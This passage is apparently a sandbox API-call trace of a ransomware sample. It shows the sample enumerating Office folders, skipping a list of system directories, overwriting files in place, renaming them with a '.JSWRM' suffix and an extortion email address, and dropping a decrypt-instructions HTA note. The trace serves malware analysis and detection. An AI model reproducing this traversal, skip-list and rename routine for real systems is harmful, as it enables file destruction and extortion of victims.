lpMultiByteStr="SPLASH.WAV", lpUsedDefaultChar=0x0) returned 10 [0130.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPLASH.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPLASH.WAV", cchWideChar=10, lpMultiByteStr=0x345e4d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SPLASH.WAV", lpUsedDefaultChar=0x0) returned 10 [0130.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\SPLASH.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\splash.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.926] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=60886) returned 1 [0130.926] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.926] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0xedd0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0xedd0, lpOverlapped=0x0) returned 1 [0130.931] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.931] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xedd0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0xedd0, lpOverlapped=0x0) returned 1 [0130.932] CloseHandle (hObject=0x338) returned 1 [0130.932] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\SPLASH.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\splash.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\SPLASH.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\splash.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.933] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b6c9560, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b6c9560, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1bc991c1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6bbc, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="WHOOSH.WAV", cAlternateFileName="")) returned 1 [0130.933] lstrcmpiW (lpString1="WHOOSH.WAV", lpString2=".") returned 1 [0130.933] lstrcmpiW (lpString1="WHOOSH.WAV", lpString2="..") returned 1 [0130.933] lstrcmpiW (lpString1="WHOOSH.WAV", lpString2="...") returned 1 [0130.933] lstrcmpiW (lpString1="WHOOSH.WAV", lpString2="windows") returned -1 [0130.933] lstrcmpiW (lpString1="WHOOSH.WAV", lpString2="recovery") returned 1 [0130.933] lstrcmpiW (lpString1="WHOOSH.WAV", lpString2="perflogs") returned 1 [0130.933] lstrcmpiW (lpString1="WHOOSH.WAV", lpString2="documents and settings") returned 1 [0130.933] lstrcmpiW (lpString1="WHOOSH.WAV", lpString2="$RECYCLE.BIN") returned 1 [0130.933] lstrcmpiW (lpString1="WHOOSH.WAV", lpString2="system volume information") returned 1 [0130.933] lstrcmpiW (lpString1="WHOOSH.WAV", lpString2="msocache") returned 1 [0130.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WHOOSH.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WHOOSH.WAV", cchWideChar=10, lpMultiByteStr=0x345e508, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WHOOSH.WAV", lpUsedDefaultChar=0x0) returned 10 [0130.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WHOOSH.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WHOOSH.WAV", cchWideChar=10, lpMultiByteStr=0x345e4d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WHOOSH.WAV", lpUsedDefaultChar=0x0) returned 10 [0130.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.933] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\WHOOSH.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\whoosh.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.934] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=27580) returned 1 [0130.934] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.934] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6bb0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x6bb0, lpOverlapped=0x0) returned 1 [0130.938] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.938] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6bb0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x6bb0, lpOverlapped=0x0) returned 1 [0130.938] CloseHandle (hObject=0x338) returned 1 [0130.938] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\WHOOSH.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\whoosh.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\WHOOSH.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\things\\whoosh.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.939] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b6c9560, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b6c9560, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1bc991c1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6bbc, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="WHOOSH.WAV", cAlternateFileName="")) returned 0 [0130.939] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0130.939] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1bc991c1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1bc991c1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="Things", cAlternateFileName="")) returned 0 [0130.939] FindClose (in: hFindFile=0x231c80 | out: hFindFile=0x231c80) returned 1 [0130.939] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1907d846, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b6c9560, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b6c9560, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ToolBMPs", cAlternateFileName="")) returned 1 [0130.939] lstrcmpiW (lpString1="ToolBMPs", lpString2=".") returned 1 [0130.939] lstrcmpiW (lpString1="ToolBMPs", lpString2="..") returned 1 [0130.939] lstrcmpiW (lpString1="ToolBMPs", lpString2="...") returned 1 [0130.939] lstrcmpiW (lpString1="ToolBMPs", lpString2="windows") returned -1 [0130.939] lstrcmpiW (lpString1="ToolBMPs", lpString2="recovery") returned 1 [0130.939] lstrcmpiW (lpString1="ToolBMPs", lpString2="perflogs") returned 1 [0130.939] lstrcmpiW (lpString1="ToolBMPs", lpString2="documents and settings") returned 1 [0130.940] lstrcmpiW (lpString1="ToolBMPs", lpString2="$RECYCLE.BIN") returned 1 [0130.940] lstrcmpiW (lpString1="ToolBMPs", lpString2="system volume information") returned 1 [0130.940] lstrcmpiW (lpString1="ToolBMPs", lpString2="msocache") returned 1 [0130.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\jswrm-decrypt.hta")) returned 0xffffffff [0130.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.942] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0130.944] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.944] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0130.945] CloseHandle (hObject=0x238) returned 1 [0130.945] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\jswrm-decrypt.hta")) returned 0x20 [0130.945] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1907d846, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b6c9560, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44b5fa6c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x225316, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0130.945] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0130.945] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1907d846, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b6c9560, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44b5fa6c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="..", cAlternateFileName="")) returned 1 [0130.946] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0130.946] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0130.946] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b6c9560, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b6c9560, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b6c9560, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16c7, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="DataListIconImages.jpg", cAlternateFileName="DATALI~1.JPG")) returned 1 [0130.946] lstrcmpiW (lpString1="DataListIconImages.jpg", lpString2=".") returned 1 [0130.946] lstrcmpiW (lpString1="DataListIconImages.jpg", lpString2="..") returned 1 [0130.946] lstrcmpiW (lpString1="DataListIconImages.jpg", lpString2="...") returned 1 [0130.946] lstrcmpiW (lpString1="DataListIconImages.jpg", lpString2="windows") returned -1 [0130.946] lstrcmpiW (lpString1="DataListIconImages.jpg", lpString2="recovery") returned -1 [0130.946] lstrcmpiW (lpString1="DataListIconImages.jpg", lpString2="perflogs") returned -1 [0130.946] lstrcmpiW (lpString1="DataListIconImages.jpg", lpString2="documents and settings") returned -1 [0130.946] lstrcmpiW (lpString1="DataListIconImages.jpg", lpString2="$RECYCLE.BIN") returned 1 [0130.946] lstrcmpiW (lpString1="DataListIconImages.jpg", lpString2="system volume information") returned -1 [0130.946] lstrcmpiW (lpString1="DataListIconImages.jpg", lpString2="msocache") returned -1 [0130.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DataListIconImages.jpg", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0130.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DataListIconImages.jpg", cchWideChar=22, lpMultiByteStr=0x2410d8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DataListIconImages.jpg", lpUsedDefaultChar=0x0) returned 22 [0130.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DataListIconImages.jpg", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0130.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DataListIconImages.jpg", cchWideChar=22, lpMultiByteStr=0x2411c8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DataListIconImages.jpg", lpUsedDefaultChar=0x0) returned 22 [0130.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\DataListIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\datalisticonimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.948] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=5831) returned 1 [0130.948] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.948] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0x16c0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0x16c0, lpOverlapped=0x0) returned 1 [0130.950] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.950] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x16c0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0x16c0, lpOverlapped=0x0) returned 1 [0130.950] CloseHandle (hObject=0x314) returned 1 [0130.950] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\DataListIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\datalisticonimages.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\DataListIconImages.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\datalisticonimages.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.951] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19758458, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19758458, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19758458, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="DataListIconImagesMask.bmp", cAlternateFileName="DATALI~1.BMP")) returned 1 [0130.951] lstrcmpiW (lpString1="DataListIconImagesMask.bmp", lpString2=".") returned 1 [0130.951] lstrcmpiW (lpString1="DataListIconImagesMask.bmp", lpString2="..") returned 1 [0130.951] lstrcmpiW (lpString1="DataListIconImagesMask.bmp", lpString2="...") returned 1 [0130.951] lstrcmpiW (lpString1="DataListIconImagesMask.bmp", lpString2="windows") returned -1 [0130.951] lstrcmpiW (lpString1="DataListIconImagesMask.bmp", lpString2="recovery") returned -1 [0130.951] lstrcmpiW (lpString1="DataListIconImagesMask.bmp", lpString2="perflogs") returned -1 [0130.951] lstrcmpiW (lpString1="DataListIconImagesMask.bmp", lpString2="documents and settings") returned -1 [0130.951] lstrcmpiW (lpString1="DataListIconImagesMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0130.951] lstrcmpiW (lpString1="DataListIconImagesMask.bmp", lpString2="system volume information") returned -1 [0130.951] lstrcmpiW (lpString1="DataListIconImagesMask.bmp", lpString2="msocache") returned -1 [0130.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DataListIconImagesMask.bmp", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0130.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DataListIconImagesMask.bmp", cchWideChar=26, lpMultiByteStr=0x241380, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DataListIconImagesMask.bmp", lpUsedDefaultChar=0x0) returned 26 [0130.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DataListIconImagesMask.bmp", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0130.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DataListIconImagesMask.bmp", cchWideChar=26, lpMultiByteStr=0x241268, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DataListIconImagesMask.bmp", lpUsedDefaultChar=0x0) returned 26 [0130.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\DataListIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\datalisticonimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.953] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1800) returned 1 [0130.953] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.953] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x700, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e534*=0x700, lpOverlapped=0x0) returned 1 [0130.955] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.955] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x700, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e530*=0x700, lpOverlapped=0x0) returned 1 [0130.955] CloseHandle (hObject=0x314) returned 1 [0130.955] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\DataListIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\datalisticonimagesmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\DataListIconImagesMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\datalisticonimagesmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.956] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1907d846, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1907d846, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x190c9cfa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d29, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="GRIP.JPG", cAlternateFileName="")) returned 1 [0130.956] lstrcmpiW (lpString1="GRIP.JPG", lpString2=".") returned 1 [0130.956] lstrcmpiW (lpString1="GRIP.JPG", lpString2="..") returned 1 [0130.957] lstrcmpiW (lpString1="GRIP.JPG", lpString2="...") returned 1 [0130.957] lstrcmpiW (lpString1="GRIP.JPG", lpString2="windows") returned -1 [0130.957] lstrcmpiW (lpString1="GRIP.JPG", lpString2="recovery") returned -1 [0130.957] lstrcmpiW (lpString1="GRIP.JPG", lpString2="perflogs") returned -1 [0130.957] lstrcmpiW (lpString1="GRIP.JPG", lpString2="documents and settings") returned 1 [0130.957] lstrcmpiW (lpString1="GRIP.JPG", lpString2="$RECYCLE.BIN") returned 1 [0130.957] lstrcmpiW (lpString1="GRIP.JPG", lpString2="system volume information") returned -1 [0130.957] lstrcmpiW (lpString1="GRIP.JPG", lpString2="msocache") returned -1 [0130.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRIP.JPG", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRIP.JPG", cchWideChar=8, lpMultiByteStr=0x345e870, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRIP.JPG", lpUsedDefaultChar=0x0) returned 8 [0130.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRIP.JPG", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.957] WideCharToMultiByte (in: 